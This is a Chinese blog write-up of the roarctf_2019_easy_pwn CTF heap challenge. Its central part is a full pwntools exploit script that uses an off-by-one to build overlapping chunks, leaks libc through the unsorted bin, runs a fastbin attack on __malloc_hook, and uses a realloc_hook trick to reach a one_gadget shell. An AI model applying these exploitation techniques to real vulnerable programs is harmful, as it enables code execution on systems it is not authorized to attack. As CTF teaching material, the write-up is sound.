roarctf_2019_easy_pwn

最新推荐文章于 2024-07-18 12:30:00 发布
最新推荐文章于 2024-07-18 12:30:00 发布
阅读量239 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python java windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/maple105890/article/details/128596598

用off by one构造的烦人的堆重叠,真的调试的我想死

先checksec一下

保护全开

顺带用patchelf换了个libc

ida里看一下

main:

算是最基本的heap模板

sun_ad0:

menu:

read_:

输入最大是0x100

creat:

用calloc创建chunk

这里附上exp里的

edit:

sub_e26:

总的来说edit函数是hint所在,可以利用off by one来深入

free_:

全都清零了,所以uaf和double free就不用考虑了

print:

没啥好说的

开始调试

先创建四个chunk

然后将chunk1(从0开始计数)伪造成大小为0x91的chunk

这是理想的chunk状态

然后把chunk1free后再申请一个0x80大小的chunk就可以重叠了

但是重新申请chunk1会把chunk2的size清空

于是要手动写入

ok

现在chunk1和chunk2有重叠了,释放掉chunk2,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字段,即main_arena + offset,然后我们通过打印chunk1就能得到程序里的main_arena + offset地址

然后这个unsorted_bin可以得到好多东西

这些偏移都是固定的,libc_base是2.23限定版

fake_chunk是用find_fake_fast自动找的

接下来先创建个chunk,把chunk的size改小

要开始构造fastbin的任意地址写了

释放chunk2,看一下布局

这就是构造出来已经释放的chunk2

然后把chunk2的fd修改成fake_chunk

根据fastbin,只需要连续申请两个0x60大小的chunk就好了

chunk4就是我们要的fake_chunk

然后就是利用one_gadget覆盖malloc_hook就好了

结果四个one_gadget没一个行的

查了wp

得知需要用利用 ralloc_hook 改变栈环境达成 one_gadget 的条件

onegadget不起作用_Maxmalloc的博客-优快云博客_"one_gadget doesn't contain string \"/bin/sh\", no

然后就能打通本地啦

但是buu上远程一直寄

完整exp:

from pwn import *

context.log_level='debug'
p = process('./easy')
#p = remote("node4.buuoj.cn",29257)
elf = ELF('./easy')
libc = ELF("/home/wh1sper/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")

def creat(size):
    p.recvuntil(b": ")
    p.sendline(b'1')
    p.recvuntil(b": ")
    p.sendline(str(size))

def edit(index,size,desc):
    p.recvuntil(b": ")
    p.sendline(b'2')
    p.recvuntil(b": ")
    p.sendline(str(index))
    p.recvuntil(b": ")
    p.sendline(str(size))
    p.recvuntil(b": ")
    p.sendline(desc)

def free_(index):
    p.recvuntil(b": ")
    p.sendline(b'3')
    p.recvuntil(b": ")
    p.sendline(str(index))

def show(index):
    p.recvuntil(b": ")
    p.sendline(b'4')
    p.recvuntil(b": ")
    p.sendline(str(index))

creat(0x18)
creat(0x18)
creat(0x80)
creat(0x18)

payload = 0x18*b'\x00' + b'\x91'
edit(0,0x18+10,payload)

payload = p64(0)*13 + b'\x21'
edit(2,len(payload),payload)

free_(1)
creat(0x80)

payload = p64(0)*3 + b'\x91'
edit(1,len(payload),payload)

free_(2)

show(1)
unsorted_bin = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("unsorted_bin-->"+hex(unsorted_bin))

main_arena = unsorted_bin - 88
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x3c4b20
fake_chunk = 0x7ffff7dd1aed
one_gadget = libc_base + 0xf1247

creat(0x80)
payload = p64(0)*3 + p64(0x71)
edit(1,len(payload),payload)

payload = p64(0)*12 + p64(0x70) + p64(0x21)
edit(2,len(payload),payload)

free_(2)

payload = p64(0)*3 + p64(0x71) + p64(fake_chunk)
edit(1,len(payload),payload)

creat(0x60)
creat(0x60)

#payload = b'\x00'*0x13 + p64(one_gadget)
#edit(4,len(payload),payload)

realloc_hook = libc.symbols['realloc'] + libc_base
payload = b'\x00'*11 + p64(one_gadget) + p64(realloc_hook+4)
edit(4,len(payload),payload)

creat(0x60)

p.interactive()

k orey0sh1
关注
pwnroarctf_2019_easy_pwn
Nothing
12-24 2185
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 900
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
easypwn
zip471642048的博客
12-01 323
esaypwn
攻防世界easypwn
weixin_44447516的博客
08-01 658
攻防世界 EasyPwn
HNCTF2024-easypwn
最新发布
sagic的博客
07-18 290
我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了。0是标准输入,1是标准输出,2是标准错误。
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 4426
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
[pwn]堆:realloc_hook控制栈结构达成onegadget
热门推荐
Breeze的博客
12-31 1万+
[pwn]realloc_hook控制栈结构达成onegadget 文章目录[pwn]realloc_hook控制栈结构达成onegadgetchunk extend通过realloc调整栈帧来满足onegadgeteasy_pwn wp chunk extend chunk extend是一种限制比较少的堆利用方式,通常通过off by one或off by null来利用。 chuank ex...
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1565
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 1002
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 611
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 335
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
攻防世界Easypwn-格式化字符串漏洞利用
aptx4869_li的博客
02-21 745
解题思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's c
new-easypwn)
m0_72827793的博客
03-12 1736
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2659
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
VNCTF2023 PWN (traveler & tongxunlu)
maple105890的博客
02-19 1028
坐牢的一天呢
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 5745
攻防世界-Pwn-new-easypwn
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 2139
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值